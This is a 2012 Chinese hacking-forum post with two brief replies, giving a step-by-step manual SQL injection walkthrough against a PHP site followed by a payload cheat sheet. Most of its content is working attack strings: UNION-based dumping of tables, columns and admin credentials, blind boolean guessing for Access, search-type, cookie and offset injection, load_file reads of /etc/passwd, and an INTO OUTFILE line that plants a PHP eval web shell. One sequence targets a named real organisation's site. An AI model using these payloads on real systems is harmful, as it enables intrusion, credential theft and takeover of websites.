找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2876|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
) U) }5 Y$ N7 o$ l# j- T8 `让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
5 E; ^0 N% A# I' f" e我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
$ Z3 w- X+ N0 S如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
* a, g, L3 E7 b% `  F1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
" \! Z$ @. ~" G3 v这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
: q1 ?- C" D' ]" G  e+ \' ~Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in6 h; D+ ?: {8 a! ?& A: Y2 _9 q
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
& M1 e4 ?" A0 o. V: W6 ^! Y+ @                        
) C0 L6 S' a: u2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入," y# }" W+ c; [( L1 K- X" T
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
" M! q3 [8 A& m3 j1 \7 [, y4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息. y2 B( {; u( K! Y" {
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
, m* N: _' F- r/ }/ K有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
  A+ r7 s0 v( C7 I" K7 e1 z; u. f2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
7 j5 j& s5 h8 d# @我就用的是第二个思路,; }% o5 E. T% j5 y# f
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  1 \2 g, C8 Q  n; }1 ]
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
9 M  H: h5 L/ k! k提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
' u. M  v6 a  w4 ^  @! Y  T注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
- @( t* e. x0 N1 |8 ~5 S* n% ]1 U7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????9 n5 U) r0 m9 T( ?
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....' |$ {  Y& X: Z0 K
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
* [- g" E7 \' I9 S: r2 }然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,) O5 o* ~; m/ {( c6 x
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......* u/ R9 \3 Z  E/ R
下面是一些很普遍注入方式资料:
1 T+ n9 \5 f0 d: ^注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='  z! s! j0 i3 k
拆半法/ ~' y: E! X  C; S
######################################
1 p) d+ T3 b# U0 qand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。: s/ i2 @/ w) u* N/ k# n; S2 f0 }
and exists (select * from admin)5 m1 N9 H7 `1 W6 e! C
and exists(select id from admin); Z7 V7 x: r7 W8 S
and exists(select id from admin where id=1)9 J3 y  x1 x- Q+ D1 S2 b
and exists(select id from admin where id>1)
6 }' W7 g0 d7 C' m- b, r然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
, {" r2 f& G3 }$ ^and exists (select username from admin)
7 J% z, b# r; m- S) K. G) `and exists (select password from admin)& f3 P4 F0 }: A# S
and exists (select id from admin where len(username)<10 and id=1)2 s6 d2 I5 T6 v
and exists (select id from admin where len(username)>5 and id=1)0 I: N5 r) N' p
and exists (select id from admin where len(username)=6 and id=1)* r2 d# D0 R3 `- f7 t
and exists (select id from admin where len(password)<10 and id=1)
7 G4 s% {# {1 L" f9 b: fand exists (select id from admin where len(password)>5 and id=1)' ^$ J) z. ]( X: ?, [
and exists (select id from admin where len(password)=7 and id=1)
6 ^6 D- e5 \9 s* J* f0 U3 `% [: @and (select top 1 asc(mid(username,1,1)) from admin)=97% I9 [2 O( \" {- c, n! T
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
5 T* [% S% P( G* M- D4 B猜第二位把username,1,1改成username,2,1就可以了。+ p' c  ^2 D* Z+ N" g  _0 Q
猜密码把username改成password就OK了
; p1 O, m$ z" B1 K" u##################################################  L: [$ E, q0 f
搜索型注入) j6 b8 j6 \# ?4 V9 H
##################################3 `( o% _0 n4 e7 L% L# q
%' and 1=1 and '%'='
& K8 }) x/ J' |4 E1 ?  H%' and exists (select * from admin) and '%'='3 D9 e1 l7 L' D: ^7 u
%' and exists(select id from admin where id=1) and '%'='4 P: h! h1 t: g1 |7 s7 f- [# `$ Z  H
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
) h( ]% ?+ o2 `$ t( }%' and exists (select id from admin where len(password)=7 and id=1) and '%'='3 s* `, \; _+ V$ W( L
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='% `' V( c: D/ r+ N- V) L
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
0 @) B8 [/ H! I/ P" n; {6 C% E对于MSSQL数据库,后面可以吧 and '%'='换成--" o; }  {: K- H0 \# b1 v
还有一点搜索型注入也可以使用union语句。
# k! n' F& f8 D7 m. u5 Z2 m########################################################' s8 m! Z& c% Z0 f1 Z. u2 F
联合查询。$ S4 f# i+ M9 _% S# h% b" @
#####################################
+ o7 `0 E: B" y" E2 E% }order by 10
3 ?3 X: {+ D& j3 [: V+ Iand 1=2 union select 1,2,3,4,5,6,7,8,9,10
& b4 E3 q, L8 ?1 \and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
  V( {* A4 W- y# w9 U* Q) pand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1, [& z( t, n  J: T* U" U
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
0 h2 M. D  g; [###################################
( Y) s' ^* w. s/ b. C2 t- j5 t. o2 @cookie注入/ v( U$ V$ N# n( K* q; @
###############################6 d: X. z1 h8 ]. e
http://www.******.com/shownews.asp?id=1271 d1 ?8 r- N5 ^
http://www.******.com/shownews.asp+ x/ x8 A4 J# x- w4 j; r7 O
alert(="id="+escape("127"));
* V$ v- {% O6 Ralert(="id="+escape("127 and 1=1"));
4 a8 h9 l# F2 l. N3 n3 nalert(="id="+escape("127 order by 10"));3 p$ i/ x) A; b; P7 t2 R; j
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
! S. ~6 K" e: u! f0 Z7 p+ R* `alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
" p8 P1 D/ R/ `. k. Q$ \这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
* P* `  ^5 h4 h4 |1 \: T- \  K. ]###################################
6 S9 ?$ c. h% [* j偏移注入8 i9 ~/ o, `- u5 B3 q
###########################################################
* k! ?  o% u1 s& E: G( f7 g5 q. c' _union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
7 z: `! T8 h0 i4 O* Y/ Eunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin0 D0 ]; @; d; j+ }( ?
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)6 s  @+ N; U' I
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
# h9 @$ e# t; F# e) o" tunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)# e* I1 u" A* m+ ~4 V0 b0 Y7 v
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
2 A. X# e8 b$ ~& @: Lunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on  m5 x8 ]5 f  y2 z8 D' ]
a.id=d.id)
3 T# _9 U8 c! ^! J( _" X  f7 @5 sand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
  \, Y# B* B8 {and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 9 M* i+ L1 }7 ^' w- Q
  
3 A& }* _7 F9 j3 k* O============================================================================================================8 I, \9 D* _5 @0 @2 \
1.判断版本5 B1 W& G2 x7 [1 c: m: f
and ord(mid(version(),1,1))>51
! Z- l- V+ f1 g% H9 e3 X7 K返回正常,说明大于4.0版本,支持ounion查询
4 b5 H* _) z! }3 F1 R3 }# M1 Z2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
+ T, M2 Y. W/ k# Qand 2=4 union select 1,2,3,4,5,6,7,8,9--; s$ M* k% P; d4 g) l, U- v5 A
3.查看数据库版本及当前用户,5 x8 P; T, c. R5 P6 P2 ~1 U! m
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
7 P0 L4 S& X7 e: Q, L数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,! K/ ?. Y. @2 J0 j  R1 |5 U
4.判断有没有写权限4 p5 a' W& e7 D$ Z- z
and (select count(*) from MySQL.user)>0--
" X" S1 f- R' |+ p5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,16 d" h0 E9 D" V9 Y4 k
用不了这个命令,就学习土耳其黑客手法,如下% w4 G7 C9 V& V0 K! g9 K
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--+ ]. S5 F7 Q- P# p
6.爆表,爆库1 _! L/ v0 T; }& G: p
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
) X3 v( p! O5 v+ B5 Q/ Z. a7.爆列名,爆表, n$ h# Y1 _( [2 s1 Z# }
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
0 `" t- ?2 c- h: U; C" F: W8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
6 ~/ P  F! E# W$ Vand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--/ M9 j0 x4 p0 b( V5 ~
9.爆字段内容% Y5 ?+ A+ x/ U5 g
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--. M4 z2 }$ k1 o; ]6 O
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表